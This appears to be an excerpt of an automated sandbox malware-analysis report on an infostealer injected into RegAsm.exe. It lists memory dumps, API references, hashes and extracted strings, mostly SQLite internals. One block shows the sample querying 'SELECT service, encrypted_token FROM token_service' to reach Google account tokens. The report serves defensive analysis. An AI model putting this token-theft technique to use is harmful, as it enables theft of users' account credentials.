                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                                                                                                                                                                                                                                              • API String ID: 0-1047910854
                                                                                                                                                                                                                                                              • Opcode ID: 5203c7f1cc14bd9523a67a291eeedfd8e7535c04b2941411f35adfacde0ee157
                                                                                                                                                                                                                                                              • Instruction ID: 865da94d31fa98665a7c50e52c963bca619dc2129c233f0e95e5136f3707a063
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5203c7f1cc14bd9523a67a291eeedfd8e7535c04b2941411f35adfacde0ee157
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0151AB7A5003006BE3116A1CEC41FBA37E6EF92735F1C424EF951462C6EB67B19182B2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-860711957
                                                                                                                                                                                                                                                              • Opcode ID: 3b9858eaafbccbe0c336a31971d9d7356c013792b5e0bbc57019ddd262068822
                                                                                                                                                                                                                                                              • Instruction ID: 4f9153f336c3c4f7711dad5a0eba907e3d1ee344b2f3c94b8052c438b32eb525
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b9858eaafbccbe0c336a31971d9d7356c013792b5e0bbc57019ddd262068822
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19B116B4A003459FE7108F38DC45B9BB3E8AF50716F0C452CE99A87281E77AF449C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %Q.$=%Q$PRAGMA
                                                                                                                                                                                                                                                              • API String ID: 0-2099833060
                                                                                                                                                                                                                                                              • Opcode ID: c11be6b2916b80653d07e494be421a128f397711604d0f3b5431b5efc5032fd3
                                                                                                                                                                                                                                                              • Instruction ID: 3df7d6a04258e40eba7ad953e7cd9cc3945b58cc80e351874b7ad67477887430
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c11be6b2916b80653d07e494be421a128f397711604d0f3b5431b5efc5032fd3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D971D076904241DBE700DF28CC80B5BB7E8BF54704F48856EF84A9B281D335E95DCBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Heapstrchr$AllocH_prologProcessstrcpy_s
                                                                                                                                                                                                                                                              • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                              • API String ID: 165438908-2554083253
                                                                                                                                                                                                                                                              • Opcode ID: c4452e68cb73842a2b96f3622f63f702c231f11502b0347549de088e44fb2826
                                                                                                                                                                                                                                                              • Instruction ID: cd674aa860a93ed15ee028e0d2560fb68057847295549111a6c1a849f8df2c2f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4452e68cb73842a2b96f3622f63f702c231f11502b0347549de088e44fb2826
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2121B472A006016FDB14DFB59C49AAF7B6DEF09314F00446AF815EB181DB38D501CB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 1239381436acf356be1c9dcf954ee300d2c7ebf49c07dcac823f9cb942518b6b
                                                                                                                                                                                                                                                              • Instruction ID: 4246c2b9fea67f093656eb2d9fe6c58b826853569fefb32b8f42e25ee2fe539b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1239381436acf356be1c9dcf954ee300d2c7ebf49c07dcac823f9cb942518b6b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D8136F58043869BD7108F24C84173ABBA0AF51202FDC497DE8D517296DB39DB86C7D2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                                                                                                                                                                                                              • Instruction ID: 32a8da9c135ca0c0c6ca6a08ab18997aa618e8b6309cf26dbd01be9fdf367d73
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13511F76A04342ABD704CF19DC80B6BB3E8EF94710F88052DF94597280E725EA99C7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198A1B17
                                                                                                                                                                                                                                                              • misuse, xrefs: 198A1B21
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 198A1B26
                                                                                                                                                                                                                                                              • block, xrefs: 198A1A90
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-4016964285
                                                                                                                                                                                                                                                              • Opcode ID: 4faec3ecf7778b7124165d7de65ccc4f927443448e98213609685aa0ff057e4d
                                                                                                                                                                                                                                                              • Instruction ID: 3d78ae92f02c421cabe827682c52743029ce51480a4d2ba25acb980c81784cbb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4faec3ecf7778b7124165d7de65ccc4f927443448e98213609685aa0ff057e4d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55C1E1B09002559FDB10CF28CC84A5A77A8FF54794F0D856DFC49DB281E735E919CBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00407E4D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040806F
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408094
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040817E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00408192
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
                                                                                                                                                                                                                                                                • Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                              • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                              • API String ID: 832884763-1713091031
                                                                                                                                                                                                                                                              • Opcode ID: ea076e332ee5bb9a2f5566caae1e44b5f75067fb30bab00997518d903317fe95
                                                                                                                                                                                                                                                              • Instruction ID: 24b3c3a282480229a1685b2020985ca130bdc32fd69098786756b1b83c0bb1d1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea076e332ee5bb9a2f5566caae1e44b5f75067fb30bab00997518d903317fe95
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19C16331804248EADB05EBE6D955ADDBBB4AF18308F14446EF401732C2DF786B18DB26
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                                                                                                                                                                                                              • API String ID: 0-1539118790
                                                                                                                                                                                                                                                              • Opcode ID: d89e9246da659309016d0bf271cb189613f8c54beabab753dca202eb61eaa1bc
                                                                                                                                                                                                                                                              • Instruction ID: 13444003b0c07232db3d8d21f75c9eb8f82cb3d827493f9c42abf3357a185430
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d89e9246da659309016d0bf271cb189613f8c54beabab753dca202eb61eaa1bc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9910171A043009BD704DF28C884BAAB7E5BF85354F58452DF98EDB391D736E84ACB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                                                                                                                                                                                                                              • API String ID: 0-165706444
                                                                                                                                                                                                                                                              • Opcode ID: caa25086791136ab4d008bab0e7dd377ba7a07b16e9ed96809b91b19e6cbde15
                                                                                                                                                                                                                                                              • Instruction ID: d9adf0d2fc4d2c06555cb6e0832d54aca6ebaf1ca717733047d94d8eb14e4b01
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: caa25086791136ab4d008bab0e7dd377ba7a07b16e9ed96809b91b19e6cbde15
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE613A759013416BF712CA25AC80B5F779DAF81215F1C846FEC968A182E731F358C7B2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
